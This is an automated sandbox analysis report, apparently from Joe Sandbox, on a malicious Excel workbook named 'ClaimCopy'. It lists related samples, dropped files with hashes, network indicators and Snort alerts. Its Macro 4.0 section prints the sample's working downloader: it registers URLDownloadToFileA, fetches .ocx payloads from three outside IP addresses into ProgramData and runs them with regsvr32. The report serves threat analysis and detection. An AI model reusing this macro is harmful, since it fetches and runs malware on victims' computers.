                                                                                                                                              Sample file name:ClaimCopy-1848214335-12022021.xlsb
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                              Number of analysed new started processes analysed:27
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal76.expl.evad.winXLSB@13/6@0/3
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:Failed
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              • Number of executed functions: 0
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              Warnings:
                                                                                                                                              Show All
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.109.88.177, 52.109.76.36, 80.67.82.235, 80.67.82.211
                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                              • Execution Graph export aborted for target EXCEL.EXE, PID 5116 because there are no executed function
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              No simulations

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              45.142.211.62ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 45.142.211.62/480628690611.dat2
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 45.142.211.62/939602286691.dat2
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 45.142.211.62/533792932717.dat2
                                                                                                                                              158.69.133.78ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78/710203175032.dat2
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78/480628690611.dat2
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78/939602286691.dat2
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78/533792932717.dat2

                                                                                                                                              Domains

                                                                                                                                              No context

                                                                                                                                              ASN

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              RACKTECHRUClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 45.142.211.62
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 45.142.211.62
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 45.142.211.62
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 45.142.211.62
                                                                                                                                              CNSL-1741057625-Nov-22.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 45.142.211.22
                                                                                                                                              CNSL-1741057625-Nov-22.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 45.142.211.22
                                                                                                                                              8Jem3WHfr1.exeGet hashmaliciousBrowse
                                                                                                                                              • 193.38.235.234
                                                                                                                                              Static.exeGet hashmaliciousBrowse
                                                                                                                                              • 193.38.235.15
                                                                                                                                              aFxrnP3GU4Get hashmaliciousBrowse
                                                                                                                                              • 91.223.144.104
                                                                                                                                              mirai.armGet hashmaliciousBrowse
                                                                                                                                              • 95.181.163.105
                                                                                                                                              W1Mjz5NWWlGet hashmaliciousBrowse
                                                                                                                                              • 91.223.144.109
                                                                                                                                              qQKiWkenaq.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              VKtCIrdZz3.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              9lzoAGDhiF.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              jgkOeJEe1J.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              2xwePIrz6Y.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              I6l48v5NQDGet hashmaliciousBrowse
                                                                                                                                              • 193.38.234.19
                                                                                                                                              Nzt41q6zTL.exeGet hashmaliciousBrowse
                                                                                                                                              • 95.181.163.15
                                                                                                                                              setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                              • 95.181.163.181
                                                                                                                                              c2nfo64gHQ.exeGet hashmaliciousBrowse
                                                                                                                                              • 95.181.163.181
                                                                                                                                              MAKONIXLVClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.78
                                                                                                                                              REJC-688189380-Nov-25.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.127.80
                                                                                                                                              REJC-688189380-Nov-25.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 185.82.127.80
                                                                                                                                              51160ae1edfcf45c5e3e6e1bedc4a5bdcfc27d5e23cb0.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.98
                                                                                                                                              New Order Contract No 44322465.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.89
                                                                                                                                              ttIfPeM79u.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.127.214
                                                                                                                                              FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              1D40F773FC7559E478572A30D1CDB0436E1FD792.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              H-Fortnite.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              FOXHACK.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              AlingWare.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              MinecraftHackV1.8.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              bbXJN4YEIq.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.114
                                                                                                                                              WjmYak325l.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.82.126.100
                                                                                                                                              RpcNs4.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.86.148.68
                                                                                                                                              y2N49ht6t4.exeGet hashmaliciousBrowse
                                                                                                                                              • 95.215.45.188
                                                                                                                                              OVHFRClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78
                                                                                                                                              ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 158.69.133.78
                                                                                                                                              reg.exeGet hashmaliciousBrowse
                                                                                                                                              • 213.186.33.5
                                                                                                                                              REQUEST FOR SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                                                              • 213.251.158.218
                                                                                                                                              ETgVKIYRW5.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              cMVyW1SDZz.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              ETgVKIYRW5.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              cMVyW1SDZz.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              2iJBYBel22.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              2iJBYBel22.dllGet hashmaliciousBrowse
                                                                                                                                              • 149.56.106.83
                                                                                                                                              Tender SN980018277 & SN9901827 Signed Copy.exeGet hashmaliciousBrowse
                                                                                                                                              • 51.161.104.181
                                                                                                                                              Invoice.exeGet hashmaliciousBrowse
                                                                                                                                              • 54.38.220.85
                                                                                                                                              AegEywmjUJ.exeGet hashmaliciousBrowse
                                                                                                                                              • 51.79.99.124
                                                                                                                                              P.O SPECIFICATION.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 51.79.99.124
                                                                                                                                              DC-330NC.xlsxGet hashmaliciousBrowse
                                                                                                                                              • 51.79.99.124
                                                                                                                                              FILE_915494026923219.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 158.69.222.101
                                                                                                                                              UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                                                                              • 158.69.222.101
                                                                                                                                              UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                                                                              • 158.69.222.101

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3AC5173B-BE2E-4080-B9F2-503317BAB84A
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):140193
                                                                                                                                              Entropy (8bit):5.357953481505316
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:icQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:KuQ9DQW+zYXfH
                                                                                                                                              MD5:EF352F7957FB2A087B0C5D550D8A6B21
                                                                                                                                              SHA1:BDF89F20B894277627536242794C7288101F32B7
                                                                                                                                              SHA-256:5EF3669A1B9DD219F8D648207C4079AC1861108BAC2E744D7D2BDCBABD5C276E
                                                                                                                                              SHA-512:CEEA5FAC3C9B7DB848BF565007B9E71EA5778FDF91D19E1BAACFE5CD812172C70310DD1CC0DF4765B1968F3C6890741D5EE2FB68141379BE7A4B32E2AAB5E04B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T16:29:09">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1E7802D5.jpg
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1098x988, frames 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):85681
                                                                                                                                              Entropy (8bit):7.915850776614707
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit
                                                                                                                                              MD5:4F100E2CEFED046B44EC799015B454EF
                                                                                                                                              SHA1:5149E5D1B5212C77B3548914E9B47D67B4BEA574
                                                                                                                                              SHA-256:D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C
                                                                                                                                              SHA-512:153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                              Preview: ......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm...........J..".................................................".............................................................q.[..+...*...K.... ..............?.......g....6..)....=~....................w5...........7_.-.......k.../...;.........!.z%o..w!....,.............?...Gs?.].......C..P~i.._.=..`....{...w....."..-........:..d.....................;z7)...~g........C....v..\..O.....0...v........v... ............A...;.~Y.}.....MsC.~..5..?.;.........V7....G...b..~...........@................O.}...o4.s_...z78.1.yl...X~.u..~..S....J..V~S..x.u~.. ..............@....u..m....rGrf.P.._+Z..?AW..~..u.G....................o&..................................................................9.0...H.Zx...M.y.[kW..o......;.....z......}v.m..[R.i....R..m....+.J............r6.P....|s..].vO._.}..K.]-V.U=9}........W......3.....G.t}Y
                                                                                                                                              C:\Users\user\Desktop\ClaimCopy-1848214335-12022021.xlsb (copy)
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):99463
                                                                                                                                              Entropy (8bit):7.8306717981031575
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:IhyB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUy+x:Inc6EehCfCZpUHKGXbBKsiiY
                                                                                                                                              MD5:2E622D58F7398008879E0DD5739E42FF
                                                                                                                                              SHA1:317CEC6EE2A5FC0DD4569669961244484F11EDAB
                                                                                                                                              SHA-256:A762C9418E5E1252EE2D08CFB7519782ED0244EBF2BEC27CEEF19C4D9F9D09F3
                                                                                                                                              SHA-512:C181267DDA8C4BF64C4440E82F70EF8DE10126E64ECE0DC9B9EF80898E50531ACEE48E8D3438F74AAB986B48BA2C48EABBCF832466DBE644B2CD75713D930F90
                                                                                                                                              Malicious:true
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...
                                                                                                                                              C:\Users\user\Desktop\D1330000
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):99463
                                                                                                                                              Entropy (8bit):7.8306717981031575
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:IhyB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUy+x:Inc6EehCfCZpUHKGXbBKsiiY
                                                                                                                                              MD5:2E622D58F7398008879E0DD5739E42FF
                                                                                                                                              SHA1:317CEC6EE2A5FC0DD4569669961244484F11EDAB
                                                                                                                                              SHA-256:A762C9418E5E1252EE2D08CFB7519782ED0244EBF2BEC27CEEF19C4D9F9D09F3
                                                                                                                                              SHA-512:C181267DDA8C4BF64C4440E82F70EF8DE10126E64ECE0DC9B9EF80898E50531ACEE48E8D3438F74AAB986B48BA2C48EABBCF832466DBE644B2CD75713D930F90
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...
                                                                                                                                              C:\Users\user\Desktop\D1330000:Zone.Identifier
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):26
                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                              C:\Users\user\Desktop\~$ClaimCopy-1848214335-12022021.xlsb
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):165
                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                              Malicious:true
                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                              Entropy (8bit):7.831014565818071
                                                                                                                                              TrID:
                                                                                                                                              • Microsoft Excel Office Binary workbook document (40504/1) 83.51%
                                                                                                                                              • ZIP compressed archive (8000/1) 16.49%
                                                                                                                                              File name:ClaimCopy-1848214335-12022021.xlsb
                                                                                                                                              File size:99677
                                                                                                                                              MD5:08dbf91f6a89fdb8dcd18dfe657147f3
                                                                                                                                              SHA1:990b5abe4b156c201174e412aca4b3dcb372070c
                                                                                                                                              SHA256:29db2ea5fcb6ab8fca34ee80ae3a9c2ebda224ee631d754208ec53bc2b610267
                                                                                                                                              SHA512:e2b04a6f333013fbd641d32f1abb99ec92d30a38d8685a83801d8f75627ba4e3d35cf261aec6cf2100d9bc23e8aeb6cd735104855309b46a82c7546eca83944b
                                                                                                                                              SSDEEP:1536:xMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:dc6EehCfCZpUHKGXbBKsiiOp
                                                                                                                                              File Content Preview:PK..........!...~.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                              Static OLE Info

                                                                                                                                              General

                                                                                                                                              Document Type:OpenXML
                                                                                                                                              Number of OLE Files:1

                                                                                                                                              OLE File "ClaimCopy-1848214335-12022021.xlsb"

                                                                                                                                              Indicators

                                                                                                                                              Has Summary Info:
                                                                                                                                              Application Name:
                                                                                                                                              Encrypted Document:
                                                                                                                                              Contains Word Document Stream:
                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                              Flash Objects Count:
                                                                                                                                              Contains VBA Macros:

                                                                                                                                              Macro 4.0 Code

                                                                                                                                              8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0)
12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0)
13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0)
15,6,=EXEC("regsvr32  C:\ProgramData\Volet1.ocx")
16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet4.ocx")
19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet5.ocx")
20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet6.ocx")
23,6,=HALT()

                                                                                                                                              1,1,523
4,9,34543
4,12,43
5,2,ui
5,9,7
5,14,43
6,14,36
7,0,ug
7,1,&#208;&#181;&#209;&#131;5&#209;&#134;&#209;&#131;5
8,9,34
8,10,5
9,1,y
9,16,346
10,7,rt
10,8,345
10,9,u
11,2,23
11,7,ertertyh57s5ry
11,11,5
11,12,35
12,1,65
12,2,7
12,9,r67
13,2,mfy
13,7,65
13,10,7
13,14,34
13,15,543
14,0,uh
14,1,y
15,0,7
15,7,65
15,10,ae46
16,2,d7
16,3,uRl
17,3,=&#34;Mon&#34;
17,9,dt
17,10,6
17,12,u
17,13,5
18,3,=&#34;URLDownloadTo&#34;
18,8,yu
18,10,sb
18,14,5
19,3,=&#34;JJCCBB&#34;
19,7,f
20,0,7
20,1,7
20,4,185.82.126.78/
20,7,523
20,8,u
21,0,md
21,4,158.69.133.78/
21,6,=RANDBETWEEN(142536473,988879789754)
21,9,s
21,11,m
22,1,7
22,4,45.142.211.62/
22,6,=&#34;.dat&#34;
22,8,6
23,4,45.142.211.62/
23,6,=&#34;.dat2&#34;
23,11,4
23,15,46
24,4,185.82.126.78/
24,6,=REGISTER(D17&#38;D18,D19&#38;&#34;FileA&#34;,D20,&#34;Drozd&#34;,,1,9)
24,8,23
24,14,6
24,15,43
25,1,567
25,4,158.69.133.78/
25,10,23
25,13,5
28,2,756
37,6,=GOTO(Tiposa1!G8)

                                                                                                                                              Network Behavior

                                                                                                                                              Snort IDS Alerts

                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                              12/02/21-17:20:33.818022TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.82.126.78192.168.2.22
                                                                                                                                              12/02/21-17:20:34.462758TCP1201ATTACK-RESPONSES 403 Forbidden8049168158.69.133.78192.168.2.22
                                                                                                                                              12/02/21-17:20:37.721969TCP1201ATTACK-RESPONSES 403 Forbidden804916945.142.211.62192.168.2.22
                                                                                                                                              12/02/21-17:20:37.918223TCP1201ATTACK-RESPONSES 403 Forbidden804916945.142.211.62192.168.2.22
                                                                                                                                              12/02/21-17:20:38.051804TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.82.126.78192.168.2.22
                                                                                                                                              12/02/21-17:20:43.124756TCP1201ATTACK-RESPONSES 403 Forbidden8049168158.69.133.78192.168.2.22

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Dec 2, 2021 17:29:12.872780085 CET4974680192.168.2.3185.82.126.78
                                                                                                                                              Dec 2, 2021 17:29:12.936528921 CET8049746185.82.126.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:12.936743021 CET4974680192.168.2.3185.82.126.78
                                                                                                                                              Dec 2, 2021 17:29:12.937355042 CET4974680192.168.2.3185.82.126.78
                                                                                                                                              Dec 2, 2021 17:29:12.997852087 CET8049746185.82.126.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:13.063477039 CET8049746185.82.126.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:13.063726902 CET4974680192.168.2.3185.82.126.78
                                                                                                                                              Dec 2, 2021 17:29:13.073276043 CET4974780192.168.2.3158.69.133.78
                                                                                                                                              Dec 2, 2021 17:29:13.176580906 CET8049747158.69.133.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:13.176789045 CET4974780192.168.2.3158.69.133.78
                                                                                                                                              Dec 2, 2021 17:29:13.177581072 CET4974780192.168.2.3158.69.133.78
                                                                                                                                              Dec 2, 2021 17:29:13.280839920 CET8049747158.69.133.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:13.677134037 CET8049747158.69.133.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:13.677334070 CET4974780192.168.2.3158.69.133.78
                                                                                                                                              Dec 2, 2021 17:29:13.684777975 CET4974880192.168.2.345.142.211.62
                                                                                                                                              Dec 2, 2021 17:29:16.689799070 CET4974880192.168.2.345.142.211.62
                                                                                                                                              Dec 2, 2021 17:29:16.726387978 CET804974845.142.211.62192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:16.726599932 CET4974880192.168.2.345.142.211.62
                                                                                                                                              Dec 2, 2021 17:29:16.727348089 CET4974880192.168.2.345.142.211.62
                                                                                                                                              Dec 2, 2021 17:29:16.763971090 CET804974845.142.211.62192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:16.965200901 CET804974845.142.211.62192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:16.965477943 CET4974880192.168.2.345.142.211.62
                                                                                                                                              Dec 2, 2021 17:29:16.976291895 CET4974880192.168.2.345.142.211.62
                                                                                                                                              Dec 2, 2021 17:29:17.012799025 CET804974845.142.211.62192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:17.156666040 CET804974845.142.211.62192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:17.156982899 CET4974880192.168.2.345.142.211.62
                                                                                                                                              Dec 2, 2021 17:29:17.160629988 CET4974680192.168.2.3185.82.126.78
                                                                                                                                              Dec 2, 2021 17:29:17.221317053 CET8049746185.82.126.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:17.301106930 CET8049746185.82.126.78192.168.2.3
                                                                                                                                              Dec 2, 2021 17:29:17.301270962 CET4974680192.168.2.3185.82.126.78
                                                                                                                                              Dec 2, 2021 17:29:17.304251909 CET4974780192.168.2.3158.69.133.78
                                                                                                                                              Dec 2, 2021 17:29:17.407633066 CET8049747158.69.133.78192.168.2.3
